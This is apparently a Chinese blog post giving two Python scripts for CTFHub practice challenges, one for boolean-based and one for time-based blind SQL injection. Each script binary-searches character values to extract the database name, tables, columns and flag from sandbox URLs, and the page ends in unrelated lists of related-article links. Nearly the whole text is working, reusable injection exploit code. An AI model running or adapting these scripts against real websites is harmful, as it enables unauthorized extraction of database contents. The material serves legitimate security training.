布尔盲注:

import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

时间盲注:

import requests

import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

sql布尔盲注和时间盲注的二分脚本的更多相关文章

  1. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  2. Natas17 Writeup(sql盲注之时间盲注)

    Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  3. sqli-labs(五)——盲注(boolean盲注以及时间盲注)

    第八关: 没有查询信息,输入id=1' 报错 ,也没有报错信息,这里应该是个盲注 使用boolean的盲注吧 先判断boolean的盲注可行 输入id=1' and '1'='1' %23 页面正常 ...

  4. 依托http-headers的 sql注入和时间盲注

    机缘巧合接触了一点关于sql注入的网络安全问题 依托 headers 的 sql 注入 一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码). 但是如果写过网络爬虫,那 ...

  5. Sqli-LABS通关笔录-5[SQL布尔型盲注]

    /* 请为原作者打个标记.出自:珍惜少年时 */   通过该关卡的学习我掌握到了 1.如何灵活的运用mysql里的MID.ASCII.length.等函数 2.布尔型盲注的认识 3.哦,对了还有.程序 ...

  6. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  7. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  8. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  9. SQL注入之Sqli-labs系列第十五关和第十六关(基于POST的时间盲注)

    开始挑战第十五关(Blind- Boolian Based- String)和 第十六关(Blind- Time Based- Double quotes- String) 访问地址,输入报错语句 ' ...

随机推荐

  1. 刷题[b01lers2020]Life on Mars

    解题思路 打开网站,检查常见的信息泄露,漏洞扫描等,都无hint.这时候有点难办了,又找了一会儿,发现抓包标签时,get的值会有参数 尝试访问,发现有如下内容: 因为实在其他地方找不到任何思路了,看着 ...

  2. 安装Ubuntu虚拟机

    centos已经满足不了我了,这里就装了个虚拟机,等有钱了再单配台单系统的Linux主机. 一.下载Ubuntu的ISO文件 用国内的网易镜像站点 进去点个16.04.6,然后下个64位的.iso就好 ...

  3. org.springframework.dao.InvalidDataAccessApiUsageException: The given id must not be null!; nested exception is java.lang.IllegalArgumentException: The given id must not be null

    通过这个简单的案例,手把手教给你分析异常信息(适合初学者看) org.springframework.dao.InvalidDataAccessApiUsageException: The given ...

  4. Python-集合 字典-set dict fronzenset

    集合 set 1. 无序 2. 去重 3. 定义空集 set() numbers = {1, 3, 4, 5, 6, 5, 4, 4, 7, 8} print(numbers) print(numbe ...

  5. C++枚举变量与switch

    转载:https://www.cnblogs.com/banmei-brandy/p/11263927.html 枚举类型和变量如何定义,下篇博客讲得十分详细: https://blog.csdn.n ...

  6. OneWire应用 单总线温度传感器DS18系列

    OneWire DS18S20, DS18B20, DS1822 Temperature DS18B20 The DS18B20 digital thermometer provides 9-bit ...

  7. SPI应用 用SPI控制一个数字电位器

    Controlling a Digital Potentiometer Using SPI In this tutorial you will learn how to control the AD5 ...

  8. vue3.0版本安装

    如果安装过其他版本的vue的话先卸载 npm uninstall -g vue-cli //卸载指令 卸载不会影响以前项目的启动 然后安装 NPM安装: npm install -g @vue/cli ...

  9. SpringBoot多任务Quartz动态管理Scheduler,时间配置,页面+源码

    页面展现 后台任务处理:恢复任务 15s执行一次后台打印消息 不BB了,直接上代码 import... /** * 调度工厂类 * Created by jinyu on 2018/4/14/014. ...

  10. 多测师讲解python函数 _zip_高级讲师肖sir

    # zip函数 #zip() 函数用于将可迭代的对象作为参数,将对象中对应的元素打包成一个个元组,然后返回由这些元组组成的对象,这样做的好处是节约了不少的内存.1.使用zip讲两个列表打印出来的结果是 ...